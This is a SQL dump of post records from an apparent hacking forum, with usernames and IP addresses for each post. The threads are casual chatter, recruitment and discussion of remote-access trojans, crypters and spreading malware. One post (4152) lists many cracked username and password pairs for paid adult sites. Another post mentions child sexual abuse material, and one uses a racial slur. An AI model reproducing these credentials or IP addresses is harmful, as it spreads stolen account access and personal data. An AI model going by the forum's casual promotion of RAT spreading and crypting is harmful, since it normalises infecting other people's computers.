'93c69ac5e1511df966898725a05b2c41', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4118', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '2', 'Apathy', '1349842440', 'Very nce achievement cannot wait for 5kz :)', '173.206.130.147', '-1378975085', '0', '0', '0', '0', '1', '42b8494b117293603cc1199f020465ad', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4119', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '3', '??????????¢™', '1349842486', 'Yep this is all because of all the great HQ, Active members that we have here. Thanks to everyone except Anarchists.', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', '25ab8df1f701bcfb951bb8851c89a222', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4120', '702', '3593', '35', 'RE: You guys like my new userbar?', '0', '205', 'mothered', '1349842517', 'It\'s certainly different, and must say that I do like It. Good work mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '534cd1dadd609c9c395007efa8762cee', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4121', '729', '4096', '7', 'RE: Skype Virus [MUST READ!]', '0', '3', '??????????¢™', '1349842538', '[quote=\'NeonLights\' pid=\'4096\' dateline=\'1349828054\'] OMFG LOL MY CUZIN GOT THIS ON HES COMP i fixed for him within 2 secs lmao [/quote] Its a good thing your cousin has a cousin that knows alot about PC\'s', '75.38.19.52', '1260786484', '1', '0', '0', '0', '1', 'ac9732a143ab4c2a1ac2308e3190bdc4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4122', '788', '4119', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '1', 't3h jok3r', '1349843007', '[quote=\'??????????¢™\' pid=\'4119\' dateline=\'1349842486\'] Yep this is all because of all the great HQ, Active members that we have here. Thanks to everyone except Anarchists. [/quote] :roflol: You seriously made me laugh. Thanks for it, I was hand-writing a 3 page essay and after all the hard work I deserved a laugh because I needed to cheer up. I agree it\'s all because of our active members. Thanks a lot to everyone. When I get the awards plugin back I will give a free award to everyone who has 5+ posts, any award of their choice except donation and upgrade awards.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b5b01673749b9eae1cb4b6f322edad2d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4123', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '222', 'Exposé', '1349845043', 'Oh yeh I was gonna ask about the awards. Sweet can\'t wait :D', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '4e22da64d0ae4fd9fa210260e163fc60', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4124', '701', '3584', '49', 'RE: Change Font in Logo?', '0', '1', 't3h jok3r', '1349845641', 'Only Reloadzor can provide the PSD file because he created the logo.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'fedccb7d9682e2483c74c80a06bfad0e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4125', '785', '4067', '49', 'RE: Install Tapatalk?', '0', '222', 'Exposé', '1349846236', 'ok thanks joker....hopefully we can get this installed :d', '69.205.61.93', '1171078493', '1', '0', '0', '0', '1', '7560b2bd2a3d9832129f0883f5b5c539', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4126', '790', '0', '58', 'Unique - Recruitment', '0', '62', 'R?????zo?', '1349863144', '[color=#1E90FF][b]Unique - Recruitment[/b][/color] This is Unique\'s Recruitment thread. Please use the format below and post your application. Don\'t PM me about it or else I will deny it. Also, don\'t request a Join Request because I will deny those too. [color=#1E90FF][b]Requirements[/b][/color] - Must have 50+ posts - Must have at least 3 threads (At least 1 tutorial, guide, ebook etc) - Must be HQ & Unique - Must have positive rep 10+ - Must contribute a lot to L33tHacking [color=#1E90FF][b]Group Userbar[/b][/color] [img]http://l33thacking.net/images/ub/unique.gif[/img] [color=#1E90FF][b]Forum Icon[/b][/color] [img]http://i.imgur.com/qvfmJ.png[/img] [color=#1E90FF][u][b]Unique Group Application[/b][/u][/color] [code][b]Name:[/b] [b]Age:[/b] [b]Username: [/b] [b]Profile Link:[/b] [b]Are you Unique?:[/b] [b]Are you HQ?:[/b] [b]Why do you wish to get into our group?:[/b] [b]What will you do to contribute to Unique?:[/b][/code]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd654a8d3be288518a9037f237533835c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4127', '789', '4106', '19', 'RE: ratters', '0', '62', 'R?????zo?', '1349863282', 'I hope I learn something from you, I\'ve ratted before but my server ends up getting fucked all the time.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'f714902f3b6dcf8b1c7e85be38e759de', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4128', '565', '2806', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '214', 'Rave™', '1349865147', 'Fucking survey, wowwww. Fix it or remove the thread.', '71.67.179.16', '1195619088', '1', '0', '0', '0', '1', '93e65ddb6afbc85d4e98086cf5142258', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4129', '716', '3643', '16', 'RE: Roku 2 XD', '0', '100', '??zg???g????61', '1349867311', 'Cool tutorial thanks. I\'m going to try this out.', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '266ee112a08597ff073c8740ddb8c10a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4130', '788', '4099', '3', 'RE: 4000 POSTS YEAH BABY!', '0', '82', 'iTzIpod', '1349868202', 'That nigga named Theodore Bagwell... Didn\'t he die?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6dc07796d415709ae911a22522b9c1f1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4131', '790', '4126', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1349868232', 'Nice. I see you changed the Forum Icon :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'a4b4bce9c6a021d510e5a87b9d2ab589', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4132', '790', '4131', '58', 'RE: Unique - Recruitment', '0', '62', 'R?????zo?', '1349869731', '[quote=\'iTzIpod\' pid=\'4131\' dateline=\'1349868232\'] Nice. I see you changed the Forum Icon :D [/quote] it\'s not changed yet, hopefully t3h jok3r changes it soon :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'f0864a572b71021a5d4d0e3fefac6d1e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4133', '729', '3657', '7', 'RE: Skype Virus [MUST READ!]', '0', '205', 'mothered', '1349870117', 'I don\'t use Skype, but shall forward this Info to friends. Thanks for the heads up mate.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'a43934b03f6b09e42006a5dea99cfc8c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4134', '791', '0', '7', 'Are you a morning person?', '0', '205', 'mothered', '1349870340', 'Greetz everyone, As the thread\'s title reads, are you a morning person? No matter how many hours sleep I get, I\'m absolutely trashed In the morning. In particular, when the alarm goes off, and I try to force myself out of bed. You guys?', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd43372f64c60135095c31e7c161ed1c1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4135', '791', '4134', '7', 'RE: Are you a morning person?', '0', '53', 'sirchamp', '1349870823', 'No. Im an evening guy. Go late to bed and get late up(if I can). I just had this topic in school.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '8382cd65fc37e72f332b4e36964e2d6c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4136', '654', '3226', '9', 'RE: Make money typing captchas', '0', '53', 'sirchamp', '1349871000', 'You will hardly make any money from this. Its like 1 dollar per 1000 words.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '1982192343f479d724f9cd176ccc7152', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4137', '792', '0', '61', 'Unique - Rules [PLEASE READ]', '0', '62', 'R?????zo?', '1349871284', 'I\'ve made a few rules that every member in Unique must follow in order to not get removed from the group. [color=#1E90FF][b]Unique Leaders:[/b][/color] Current leader: [url=http://l33thacking.net/user-62.html]R?????zo?[/URL] Co-Leader: [url=http://l33thacking.net/user-82.html]iTzIpod[/URL] [color=#1E90FF][b]The rules are:[/b][/color] [list] [*]You will not share anything that\'s in Unique forums, even if it\'s leaked. [*]We are a brotherhood, we will respect each other inside and outside Unique, I don\'t want to see anyone fighting because of stupid reasons. [*]You will not scam anyone, if I get to know our group name is been used in order to help your scam you will be removed permanently. [*]We are an invite only group, only most HQ and trustable members will be a part of it. [/list] If you violate any of the rules above I will take serious actions or removing you from the group. Rules will be updated again shortly once I think about it in more detail, suggestions are accepted too.', '94.132.244.168', '1585771688', '1', '0', '62', '1350229176', '1', 'd22019c3955c488fad1167bec139f142', '0', '1350229176'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4138', '565', '2806', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '100', '??zg???g????61', '1349872870', 'Ahh sorry about that, I leaked this from another website. Nothing I can do about it, sorry.', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '8ffc2437aaa7def7ad036d0895db65d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4139', '786', '4087', '64', 'RE: Awesome FREE site for watching latest anime and cartoons', '0', '100', '??zg???g????61', '1349872911', ':D Glad I could help. I watch all my Anime on there.', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '8ab40fce36cdf9effe4a5560a4a56ce1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4140', '654', '3226', '9', 'RE: Make money typing captchas', '0', '100', '??zg???g????61', '1349872975', 'Actually its 0.75 per 1000 capachas xDDD', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', '5bdd609155170f1a5fae34a837011060', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4141', '789', '4106', '19', 'RE: ratters', '0', '100', '??zg???g????61', '1349873367', 'Hes been teaching me about ratting, I know a lot about networking, I also program Java, HTML and some php but I know hardly anything about ratting :) he explained it too me.', '178.209.51.79', '-1294912689', '1', '0', '0', '0', '1', 'ee4848d6292c5d61bf7141e991a10e5b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4142', '673', '3410', '29', 'RE: The only allowed \"how to deep web\" tutorial here.', '0', '53', 'sirchamp', '1349873517', 'Already knew this. You can also watch kids porn there.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'cdf30c3f4e498d8679cda1ad3dc6eb99', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4143', '392', '3962', '9', 'RE: PPD Niches', '0', '228', 'VirtualLegend', '1349874577', '[quote=\'iTzIpod\' pid=\'3962\' dateline=\'1349734697\'] Go on Leakforums and go on Skill\'s PPD thread. [/quote] Thanks for the Tip', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'f98300335231fbb9462076e6f723ee85', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4144', '410', '1890', '30', 'RE: Enhance Views Credits Booster', '0', '53', 'sirchamp', '1349875002', 'Double post. You have a thread with the exact same tool.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'a14263fbefe6edf2ebaa29af9cc32872', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4145', '793', '0', '9', 'How To Make $5+ A Hour | Even Your Grandma Can Do It', '17', '228', 'VirtualLegend', '1349876465', '[color=#9400D3][size=medium]Whats Up Money Makers, Today I\'m gonna show a site; [url=http://naturebucks.com/members/register.php?ref=VirtualLegend]naturebucks.com[/url] NatureBucks is a GPT site where you get paid to complete offers. The site has been online and paying for over a year now. So far there appears to be no major issues or any connection to past $cam sites. Site does not ask for any money or upgrades. So all you have to lose is your time. [/size][/color] [color=#C71585]Questions and Anwsers: Q: Do i need any stuff for this? A: Only a internet connection and a PC/laptop Q: Will this work in any country? A: Yes, even in the Sahara Q: Do i need any skills for this? A: No, even your Grandma can do it and i mean it Q: How much will i make with this? A: It is possible to make more than $5 a Hour[/color] [url=http://naturebucks.com/members/register.php?ref=VirtualLegend][img]http://naturebucks.com/images/banners/44.png[/img][/url] [color=#98FB98][size=medium]For Questions or help leave a post behind or contact me on skype: VirtualLegend[/size][/color]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'c14f969a44b3b4e6ec46ccc17f871897', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4146', '418', '1925', '16', 'RE: [eBook][Special] iTzIpod\'s SEing Tutorial', '0', '228', 'VirtualLegend', '1349878392', 'Nice Ebook it will help people alot !!!', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'bc4b7ff4d6d2fc4c92f70151410f50d3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4147', '789', '4106', '19', 'RE: ratters', '0', '203', 'NeonLights', '1349880458', 'il help anyone in need of it but im kinda busy spreading over youtube and my network so whenever i have the time il do my best to be there :)', '205.237.34.10', '-840097270', '1', '0', '0', '0', '1', '44d7a4aa1428a037f4d09b78dc187f97', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4166', '789', '4106', '19', 'RE: ratters', '0', '100', '??zg???g????61', '1349904065', 'Well for a free RAT its awesome I just mean compared to all other RATS its pretty lame. Oh and your post was HQ by the way ;)', '65.96.215.138', '1096865674', '1', '0', '100', '1349904089', '1', '16ee8184b2c89dfbf575e01c773aad5d', '0', '1349904089'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4149', '789', '4106', '19', 'RE: ratters', '0', '62', 'R?????zo?', '1349882768', 'well I can setup a rat and stuff but when I try to crypt it doesnt work proprely anymore, I been using Darkcomet, is that one good enough?', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '7357aeebc39a76990360a757deaa16e1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4150', '793', '4145', '9', 'RE: How To Make $5+ A Hour | Even Your Grandma Can Do It', '0', '53', 'sirchamp', '1349883068', 'Firstly this method already has been posted.(http://l33thacking.net/thread-773.html) This works in every country but you cant make money in every country with it. It only has good offers for the USA and the Uk.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '0ef09925cd827d977553597ce6a13dcc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4151', '791', '4134', '7', 'RE: Are you a morning person?', '0', '61', 'NXK', '1349883297', 'You\'re exactly like me, that\'s why I just gave up on going to bed early, I go to sleep ay like 1am everyday and wake up at 6am daily.. My first 2 classes are hell.', '99.253.94.204', '1677549260', '1', '0', '61', '1349883319', '1', 'e5440bcbd2bd12a3e07e3ae2dbcea002', '0', '1349883319'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4152', '794', '0', '54', 'New XXX Porn Passwords: 10 Oct 2012', '0', '62', 'R?????zo?', '1349883791', 'Today 10/10/2012 Cracked Porn Site\'s Logins for people who enjoyed to watched. Have fun.. collegerules.com mood WALKER blacksonblondes.com Br42g87 Xg4823ph members.earlmiller.com pabelanet finesse members.guysluckyday.com johnny1 isvipebaby members.teendirtbags.com jhon ASh8ducqsTxBERUn amberlynnonline.net monz78 70camaro 3rd-art.com marsbug 122852 members.stephanieswift.com zglabu access meandmylatina.com ttttt99 bjornt members.suze.net stormch8ser51 stormy8 auth.redclouds.com dilmun hemlock blacksonblondes.com accessjake picard polishbustyxxl.com forxxxhq birthday23 gushbusters.com didge151 sigma151 auntjudys.com finta 1576325 totallyhotxxx.com andrew88 98176890 bethandaaron.com surgict ownzyou6 sammy4u.com testibill ibilltes amateurallure.com hpycpl hubby shaunasand.com DANDFA DFADAN indavip.net giampi09 squiggles members.movieerotica.com shadow8 biotch members.iwantamateurs.com msaleb bd1304 oralgirlfriends.com joker 5552000 members.ultrampegs.com calbear Jennyff terimarieharrison.com MLForman Skeld123 polishbustyxxl.com eztjol beszoptad udderlover.com BadAnakin BadJedi willsheexplode.com light cell auntjudys.com webmaster hackerz balloonerotica.com julie456 julie456 auth.redclouds.com alwynder mercedes girlsgonewild.com Armando gato members.maturehotel.com ickasd weass assparade.bangbros.com doopster poopster aprilsbodyshop.com reese21 denvo74 members.gangbanglessons.com rainbow 1234qw realgfstube.com dkw zen members.guysluckyday.com 00317235 1230749 lavalush.com xkitten angels chromeonline.com zunga access members.stephanieswift.com steveo brandon jugfuckers.com jhhiii tank1221 members.sclorch.com review123 review12 mynngf.com tricky hard nikkiziering.com gerhardt redshift blacksonblondes.com fin spring members.petitebeaver.com aburton th1n1n girlsgonewild.com Bissdogg ironman6 jenniferwalcott.com Grenden 189201 latinofanclub.com shaker pepper members.maturehotel.com siadewalk surfer cybercheyenne.com dell50 pussy50 aamesummers.com natasha zolushka7 sydneesteele.com 113000 whippet hardcore-janine.tv gtfullam sunny polishbustyxxl.com natasha zolushka0 twistys.com brianh surfboar jizvideo.com 21535 52621 members.yourfantasies.com dmanboy hotstuff blacksonblondes.com wrw1076 putcall members.villagepink.com iduex2 4hwcud members.momsneedcash.com wilson appolo13 aboutvoyeur.com j10e5d4 jed1054 members.suze.net testpilot formula crystalfilms.com bugite muffin members.hentaixxxsex.com ghost ghostbear rearend.com svolitch peezda blacksonblondes.com 1234 5678 tiffanyparis.com Daantman angus01 watchmygf.com Donna skantz members.hotspermfacials.com 00264912 5588787 members.teenslutsgonewild.com stisdnky butt indavip.net jeep1 3510 clublove.com BAFATRUG1 SALLY1 talentgirls.com mobius4175 control shockathome.com moimoy ffffff adraianaventis.com 643typt 643typt members.cherokeexxx.com lhmmw2 462438 daily-desktops.com takasaka izumiman hentaiteengfs.com miyata carla members.gangbanglessons.com spleen spleen4 gloryhole.com joeb68 lincolns lisadergan.com edferra12 scubadiv tagteamtranny.com uuuuuu daisy chelseacharms.com raider fastball sammy4u.com qwerty11 foobar tiffanytaylor.com Grenden 189201 sammy4u.com parney marcie members.hentaifactory.nu truazenpnoy scorpion altniche.com jason jason daily-desktops.com ErnstBlofeld newdawn summergf.com snatch 974197 girlfriendorgasms.com haywww vette atkarchives.com rjtre19 atk37rrs members.iboobs.com dfilippo ommra815 members.hardcoremoviestation.com annette geoffrey amateurcreampies.com exhibita hammer1 members-main.com wizofid romance andrewblake.com mrtimm lovelife aboutvoyeur.com cege tege bigmouthfuls.bangbros.com nennip ruskom blacksonblondes.com birkenhe 1golfer willsheexplode.com dave2 hotrod girlcreations.com RickyTX fountain members.stephanieswift.com nova58 access girlsgonewild.com dlascell thermal blacksonblondes.com falcos oslolo jenniferwalcott.com Stone55 55BGates blacksonblondes.com mhm30022 golf50 members.orgyfantasy.com pussycat 4290 polishbustyxxl.com delwyn el54621899 babylonxxx.com tyson lady members.herfirstdick.com butt plug imilfhunter.com aard vark members.iboobs.com dfilippo ommra815 blackthumbs.net blackcunt seo9yjse lindseyvuolo.net tamarese fordsierra chromeonline.com sheet access blacksonblondes.com xeon666 hooters aboutvoyeur.com forxxxhq birthday realjapanesegfs.com micr vanses wrestlingvixxxens.com test1 test blacksonblondes.com qwerty qwerty exxoticplaces.com bigbill bigjim hardcore-janine.tv ficktjuv fick1tju polishbustyxxl.com tyke1170 nowayout cahottie.com pr0t3st lovesyou1322 members.maturehotel.com fl00dA c0nfus3d erotic.com a12345 b12345 watchmygf.com ayrton dennis tiffanytaylor.com sx485969 349988 bigmouthfuls.bangbros.com rosadod Dee17771 assparade.bangbros.com summer winter neighborswife.com mthewho2 amanda members.asiancream.com dodsble1 trouble amateurkeyclub.net dft_56 trotters @1st-sex-finder.com jkldfs uiorew tiffanygranath.com jaydog472 silent72 watchmygf.com guest maul members.petitebeaver.com gasdh50 rola members.wildlatinagirls.com icasd weass membersmanager.com rileyrugger mustard johnholmes.com hoosie pauline adraianaventis.com blender radial9 barelyevil.com mlas002 slamslam members.hentaifactory.nu wap_bbs stirlitz naughtyallie.com schlatz boooty kscans.com dn012704 3ip76k2 meatmembers.com Gadolman letmein streamthevids.com clark112 webdev members.hisfirstthreesome.com philippe TYG5WkEbfpsqZMio realpartygfs.com sexxman fuzzy stacyfuson.com doornx pikkels neighborswife.com unityrwe orange8 terimarieharrison.com s1107d s4114d members.hugedickslittlechicks.com mccoompa murphy blacksonblondes.com 1brooks Happy members.villagepink.com wg308810 5ppeei members.momsneedcash.com webster052862 boog1962 bitchisland.com aramasa 21363558 blowtube.com 033314 320033 assparade.bangbros.com norllib tangos myebonygf.com casey radical cruisepatrol.com saladboy 98226DT brazzers.com mneedle westside amateurcreampies.com thikital nikonos polishbustyxxl.com dimas wapbbs girlfriendaccess.com hewitt fuckit2 girlsgonewild.com rraven83 tahoe83 nejcpass.com thesetup hatesyou chromeonline.com Pleujer access assparade.bangbros.com mahoura nounte polishbustyxxl.com forxxxhq birthday31 membersmanager.com neilelkins another1 coletteguimond.com red187 reg781 members.hugedickslittlechicks.com newyork knicks wilderotica.net opopop11 sonyfuck members.asiancream.com laasder1 fire members.wildpass.com vinmal69 696969 burningangel.com tst tst666 interracialschoolgirls.com rick rick kenmarcus.com Misiar access daily-desktops.com fballxl5 scoobie clublove.com kpc955 555555 lovettexxx.com KDENNIS FITTEC zerotolerance.com bubba farrid zerotolerance.com miles beach123 bessiebardot.com 19234424 8266026 udderlover.com postal porn blacksonblondes.com howlyn loveit jizzonmygf.com ass1 matt brazzers.com formula1 antigua cleavagelovers.com bobo bobo dirtywivesexposed.com sandy garth members.uncensoredextreme.com trouble porkey www2.pictureview.com 994642 540713 collegetruelife.com 5424 thuy polishbustyxxl.com test123 test123 4adultery.com 033314 320033 members-main.com jamie1 stewart aamesummers.com forxxxhq birthday7 yummymama.com floyd8690 86908690 preggysex.com edseebach xu71eab7 myebonygf.com lives jeffz 